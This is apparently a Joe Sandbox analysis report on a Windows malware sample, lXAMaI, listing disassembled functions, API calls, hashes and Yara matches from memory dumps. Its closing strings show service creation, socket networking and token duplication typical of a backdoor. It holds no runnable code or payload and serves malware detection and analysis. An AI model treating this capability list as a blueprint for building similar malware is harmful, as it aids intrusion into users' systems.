Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 3022145982-0
Opcode ID: b12fa24a2c62b547a17544fb1c1a5f27611fa0a097e7b794efa467ddbfbf0bd0
Instruction ID: e2699a205d831de6bca7aecad0b149024eee52620ec56fa863972d5449675053
Opcode Fuzzy Hash: b12fa24a2c62b547a17544fb1c1a5f27611fa0a097e7b794efa467ddbfbf0bd0
Instruction Fuzzy Hash: 4D11C278640208E7E300D794ADA0FBE3364EB463C9F320128FA04AA245DF30ED1992A6

Function 0309DCDA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

*~-X, xrefs: 0309DCED

Memory Dump Source

Source File: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID:
String ID: *~-X
API String ID: 0-4114503221
Opcode ID: 4ee20a71c00f78e83d1afdb41a22689f1e44ab33b662628b41d6d5443987c3e7
Instruction ID: 5bf79d3989085353ea07c86b58130970d37953a430f935ba61de3d997809698e
Opcode Fuzzy Hash: 4ee20a71c00f78e83d1afdb41a22689f1e44ab33b662628b41d6d5443987c3e7
Instruction Fuzzy Hash: EA114C3690A701ABC718AF24C50006BBFB5AFD03A4F55CA1DE89657184CB74DD07CF82

Function 1001365D Relevance: 3.0, APIs: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1001864D: HeapAlloc.KERNEL32(00000008,100107FA,00000000,?,?,?,?,?,100107FA,?,?,10010760,?,?,?), ref: 10018743

CreateThread.KERNEL32(?,100107FA,100136C8,00000000,?,?), ref: 1001369E
GetLastError.KERNEL32(?,?,?,100107FA,?,?,10010760,?,?,?), ref: 100136A8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AllocCreateErrorHeapLastThread
String ID:
API String ID: 3580101977-0
Opcode ID: 0cf6177cf1021d5453907bf8241ddca84707924641c58518b686c8d1529303e1
Instruction ID: 4503f94186c58099f1bf7510f62b9ee2cafc75a0e569154e090e430fa00f9d30
Opcode Fuzzy Hash: 0cf6177cf1021d5453907bf8241ddca84707924641c58518b686c8d1529303e1
Instruction Fuzzy Hash: 65F02836600611BFDB21DF659C01D9B7FA5EF413B1B10C119FE18DA2A0CB31E8818BA0

Function 10017334 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,100138EB,00000001), ref: 10017345

Part of subcall function 100171EC: GetVersionExA.KERNEL32 ref: 1001720B

HeapDestroy.KERNEL32 ref: 10017384

Part of subcall function 10017439: HeapAlloc.KERNEL32(00000000,00000140,1001736D,000003F8), ref: 10017446

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: ca20fd22e9d4a316faf4a6763d34f76899b2d03490989c6122e84f199ccc62db
Instruction ID: c68bf2092a6a542911baf806befea6508f1a83b17a57139500aa4cb1b8bda2f9
Opcode Fuzzy Hash: ca20fd22e9d4a316faf4a6763d34f76899b2d03490989c6122e84f199ccc62db
Instruction Fuzzy Hash: 12F06D74628316AAEB118B748D867193AF4FB09681F204526FD1CCD0A0EB70C6C2A602

Function 100122A7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
GetLastError.KERNEL32 ref: 100122B6

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 1a150ff66afb2cfed35c19f71a39e7b2e7d0d4c9caaca0de23a994186a73b60a
Instruction ID: bc6dca72979e54348c7386074b1d6110f0df1a9f8705a334e43719eb0889a2fc
Opcode Fuzzy Hash: 1a150ff66afb2cfed35c19f71a39e7b2e7d0d4c9caaca0de23a994186a73b60a
Instruction Fuzzy Hash: 09E0ECB4405640AADB419BB0DD4A70D3A95EF56365F610A44F4758D0F2CB74C8E5A622

Function 1000241C Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431
SetFileAttributesA.KERNEL32(?,00000080,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002442

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 41052a67d3df5a161208ba3610da3b44709aa611b5f0ce78b21e30e3a3d22ec5
Instruction ID: bbe4b3150a7adba5b2c85e4b04b9aa963e057579b4c4c5c75651e3863ef42d3d
Opcode Fuzzy Hash: 41052a67d3df5a161208ba3610da3b44709aa611b5f0ce78b21e30e3a3d22ec5
Instruction Fuzzy Hash: ACD05E35240308FBFB00DF50CC86BAA376CEB44781F10C110F90C8A190DB75E94187D0

Function 0240017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 024001DF

Memory Dump Source

Source File: 00000007.00000003.2808702867.0000000002400000.00000040.00001000.00020000.00000000.sdmp, Offset: 02400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_2400000_lXAMaI.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: b7541a80d6e9e92ab728819cd9edf52ee1f0df2d23852b7aaa12258300a7f7a0
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: C7A12670A00606AFDB15CFA9C8C0BAAB7B5FF48308B14917AE415DB391D770EA91CB94

Function 0240044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0240048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 024004F1

Memory Dump Source

Source File: 00000007.00000003.2808702867.0000000002400000.00000040.00001000.00020000.00000000.sdmp, Offset: 02400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_2400000_lXAMaI.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: 7e2af15c7748bd1b3b63006fa531296c8fc4c73c5a1a78dbb13dc1859166aaaa
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: 75210875A00305BBCB209FA48CC1FAFB7F9EF04314F10443AEA0AA22C1D731A981DA64

Function 10012F4B Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,100107FA,00000000,00000000), ref: 10013032

Part of subcall function 100152F4: InitializeCriticalSection.KERNEL32(00000000,00000000,100107FA,?,10018703,00000009,00000000,?,?,?,?,?,100107FA,?,?,10010760), ref: 10015331
Part of subcall function 100152F4: EnterCriticalSection.KERNEL32(100107FA,100107FA,?,10018703,00000009,00000000,?,?,?,?,?,100107FA,?,?,10010760,?), ref: 1001534C

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 090f293a2dffe6238705ef5448f623a61699f21f33e7481bc8a14dadb32f089e
Instruction ID: b8079d1633b20074ee14d165e29abdcb67a2723b2f3ee19b4a15c6b84aec5018
Opcode Fuzzy Hash: 090f293a2dffe6238705ef5448f623a61699f21f33e7481bc8a14dadb32f089e
Instruction Fuzzy Hash: 56219232A00619ABE711DF68DC52B8EB7F4FB09760F248126F914EF1C1D774E9C19A94

Function 03080E5E Relevance: 1.5, APIs: 1, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 03080E85

Memory Dump Source

Source File: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: fa2264675d5474d46dc950bb80b50b804db79a0ab8372e13654645a519dd428f
Instruction ID: d7a4fffb5af6fd114e7bfee7d2b71c2ecb86f214a3549a238b8a33c42dca111d
Opcode Fuzzy Hash: fa2264675d5474d46dc950bb80b50b804db79a0ab8372e13654645a519dd428f
Instruction Fuzzy Hash: 3101D4AA80C301EBD705AB71C9802DEBBE2AFA4390F66C91CB5DE12255E3769455CB03

Function 10010760 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 10010783

Part of subcall function 10010A51: LoadLibraryA.KERNEL32(user32.dll), ref: 10010A79
Part of subcall function 10010A51: GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 10010ACE
Part of subcall function 10010A51: GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 10010AE0
Part of subcall function 10010A51: GetProcAddress.KERNEL32(?,CloseDesktop), ref: 10010AF2

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$EventLibraryLoad
String ID:
API String ID: 2618588663-0
Opcode ID: 8832dec72ccf871cf7ce79060aa005a2b01ecdcf1e789104bb2bb5159d03818d
Instruction ID: 359bcac5a09172fef094b278e9db91f7983d9258bc7ecf021300e1ac8f017e65
Opcode Fuzzy Hash: 8832dec72ccf871cf7ce79060aa005a2b01ecdcf1e789104bb2bb5159d03818d
Instruction Fuzzy Hash: 8CF012BAE00209ABDB10DFA4CD46BAFB774EF44300F100564F905AB281E675EA54CBA2

Function 1001372C Relevance: 1.5, APIs: 1, Instructions: 24threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10013734

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 95fd22223d067b234b12ca3e09bbc928b53b8f334e2384762cbefad50c80d1e0
Instruction ID: 37e4cdb9d3f075c461b7035ca70e3761cd767857c40c5843a2333ac9efdc0c92
Opcode Fuzzy Hash: 95fd22223d067b234b12ca3e09bbc928b53b8f334e2384762cbefad50c80d1e0
Instruction Fuzzy Hash: 9AE06DB22012108FD760DFB8DC4574DB7F0FF00725F20892AD162C65D0DB75E5808A10

Function 0043261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00432630

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7f15115c3e1e91744eaf020392dfabfe54fc7f5e8953be9e3d345a4c30a7356f
Instruction ID: 438708a3b7149a155fed4cfa6420aa06fc27b5fbbc1a3c96a6cffb21cc9e90cc
Opcode Fuzzy Hash: 7f15115c3e1e91744eaf020392dfabfe54fc7f5e8953be9e3d345a4c30a7356f
Instruction Fuzzy Hash: 3ED0A7325543446EDB009F717C497223BDCD784795F10943ABA0CC62A1F774C590CA4C

Function 10013783 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 100137B8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 47496f94459d0206713a601fa71ce241cbd785c63b3f206e0bef3e98b152e21d
Instruction ID: cef63e4ba4283862f881bab32a860e353df0403ca9f8af0eb2190f429ef3333b
Opcode Fuzzy Hash: 47496f94459d0206713a601fa71ce241cbd785c63b3f206e0bef3e98b152e21d
Instruction Fuzzy Hash: 3BE0CD755051256FEB12D760CC0665D3764EF00350F044020FC005F0A1DF71ECE18793

Function 035A12A0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

NdrClientCall2.RPCRT4 ref: 035A12BC

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: Call2Client
String ID:
API String ID: 1775071923-0
Opcode ID: 1ff22b081c45f13cfe9e987d9881654d87584550fe757013067b375b36cb4ce7
Instruction ID: b8d32741082f0d66f28fb0faf4597b95b9cefaeeb408ee094976fb85b1d00bbc
Opcode Fuzzy Hash: 1ff22b081c45f13cfe9e987d9881654d87584550fe757013067b375b36cb4ce7
Instruction Fuzzy Hash: 27D05EB1A0110CBFC704CE98EC41AE97BFCEB85201F0040AAEA0AD2211E6315A544695

Function 1001378E Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 100137B8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 3381e4b24ab796d0a350117279f75434815b0b8773a005ba26cf6e1fd6131f45
Instruction ID: 88dcdb5edf58897bcfffc47775a959dcac4c8c09815a173079941dce3fcbb257
Opcode Fuzzy Hash: 3381e4b24ab796d0a350117279f75434815b0b8773a005ba26cf6e1fd6131f45
Instruction Fuzzy Hash: B5D05EB51055226BF222D764CC46A1D3788DF41691B098424F8409E091DF71ECC185A2

Function 036012A0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

NdrClientCall2.RPCRT4 ref: 036012BC

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: Call2Client
String ID:
API String ID: 1775071923-0
Opcode ID: c1812525367a33cf5a6e7c52f0e6be6094748c3582f8e1fe2ffb85b5e4782573
Instruction ID: 6b722e13f431bc43e3c2015d13b9e466714340dea1e599daa57f3aff4eec1d32
Opcode Fuzzy Hash: c1812525367a33cf5a6e7c52f0e6be6094748c3582f8e1fe2ffb85b5e4782573
Instruction Fuzzy Hash: 7DD05EB2A0110CBFC708DE98DC52AA97BECDB85301F04406AE90AC2305E6315A6046E5

Function 03001990 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 030019A7

Memory Dump Source

Source File: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a065ba96fed36bba4abbc5a28995c4cf35b11798bfa7b77ed291235a938847b
Instruction ID: 8d14f0d8fb1c4e3d27d8116bf486b371ee88f9f082678c6ed8a8d1477fc5d26e
Opcode Fuzzy Hash: 9a065ba96fed36bba4abbc5a28995c4cf35b11798bfa7b77ed291235a938847b
Instruction Fuzzy Hash: 72B0929498831829860773A0D44A96E258BAEA1605B92961DE10502150EABA2962C8B5

Non-executed Functions

Function 1000EC78 Relevance: 249.0, APIs: 71, Strings: 71, Instructions: 495libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,10054CD0,?,1000B595), ref: 1000EC94
GetProcAddress.KERNEL32(6A016A1C,CreateProcessA), ref: 1000ECAC
GetProcAddress.KERNEL32(6A016A1C,GetModuleFileNameA), ref: 1000ECC4
GetProcAddress.KERNEL32(6A016A1C,CreateMutexA), ref: 1000ECDC
GetProcAddress.KERNEL32(6A016A1C,ReleaseMutex), ref: 1000ECF4
GetProcAddress.KERNEL32(6A016A1C,GetLastError), ref: 1000ED0C
GetProcAddress.KERNEL32(6A016A1C,CloseHandle), ref: 1000ED24
GetProcAddress.KERNEL32(6A016A1C,Sleep), ref: 1000ED3C
GetProcAddress.KERNEL32(6A016A1C,lstrcatA), ref: 1000ED54
GetProcAddress.KERNEL32(6A016A1C,GetTickCount), ref: 1000ED6C
GetProcAddress.KERNEL32(6A016A1C,WaitForSingleObject), ref: 1000ED84
GetProcAddress.KERNEL32(6A016A1C,GetFileAttributesA), ref: 1000ED9C
GetProcAddress.KERNEL32(6A016A1C,CreateEventA), ref: 1000EDB4
GetProcAddress.KERNEL32(6A016A1C,ResetEvent), ref: 1000EDCC
GetProcAddress.KERNEL32(6A016A1C,CancelIo), ref: 1000EDE4

Strings

StartServiceA, xrefs: 1000F24E
DeleteService, xrefs: 1000F2F0
EnumWindows, xrefs: 1000EF93
getsockname, xrefs: 1000F19B
OpenSCManagerA, xrefs: 1000F218
GetModuleFileNameA, xrefs: 1000ECB8
setsockopt, xrefs: 1000F14A
MoveFileExA, xrefs: 1000EEB0
CloseServiceHandle, xrefs: 1000F269
wsprintfA, xrefs: 1000EF0C
CancelIo, xrefs: 1000EDD8
GetLastError, xrefs: 1000ED00
QueryServiceStatus, xrefs: 1000F284
CreateProcessA, xrefs: 1000ECA0
CreateServiceA, xrefs: 1000F2BA
TerminateThread, xrefs: 1000EE08
memcpy, xrefs: 1000EFF5
strcmp, xrefs: 1000EFBF
ExpandEnvironmentStringsA, xrefs: 1000EE50
connect, xrefs: 1000F0DE
socket, xrefs: 1000F08D
SetTokenInformation, xrefs: 1000F341
ws2_32.dll, xrefs: 1000F046
GetCurrentProcess, xrefs: 1000EEE0
kernel32.dll, xrefs: 1000EC8F
GetVersionExA, xrefs: 1000EE20
gethostbyname, xrefs: 1000F0A8
WSACleanup, xrefs: 1000F072
RegisterServiceCtrlHandlerA, xrefs: 1000F1FD
IsWindowVisible, xrefs: 1000EF5D
GetSystemInfo, xrefs: 1000EE68
wininet.dll, xrefs: 1000F377
GetFileAttributesA, xrefs: 1000ED90
select, xrefs: 1000F180
ExitWindowsEx, xrefs: 1000EF27
recv, xrefs: 1000F114
WSAStartup, xrefs: 1000F057
GetExitCodeProcess, xrefs: 1000EE38
WTSGetActiveConsoleSessionId, xrefs: 1000EEC8
Sleep, xrefs: 1000ED30
memset, xrefs: 1000F010
ControlService, xrefs: 1000F29F
strstr, xrefs: 1000F02B
WSAIoctl, xrefs: 1000F165
CloseHandle, xrefs: 1000ED18
User32.dll, xrefs: 1000EEFB
CreateMutexA, xrefs: 1000ECD0
WaitForSingleObject, xrefs: 1000ED78
MSVCRT.dll, xrefs: 1000EFAE
send, xrefs: 1000F0F9
gethostname, xrefs: 1000F1B6
SendMessageA, xrefs: 1000EF78
ReleaseMutex, xrefs: 1000ECE8
GetSystemDirectoryA, xrefs: 1000EE80
lstrcatA, xrefs: 1000ED48
ResetEvent, xrefs: 1000EDC0
OpenServiceA, xrefs: 1000F233
OpenProcessToken, xrefs: 1000F30B
htons, xrefs: 1000F0C3
DuplicateTokenEx, xrefs: 1000F326
strlen, xrefs: 1000EFDA
ChangeServiceConfig2A, xrefs: 1000F2D5
MessageBoxA, xrefs: 1000EF42
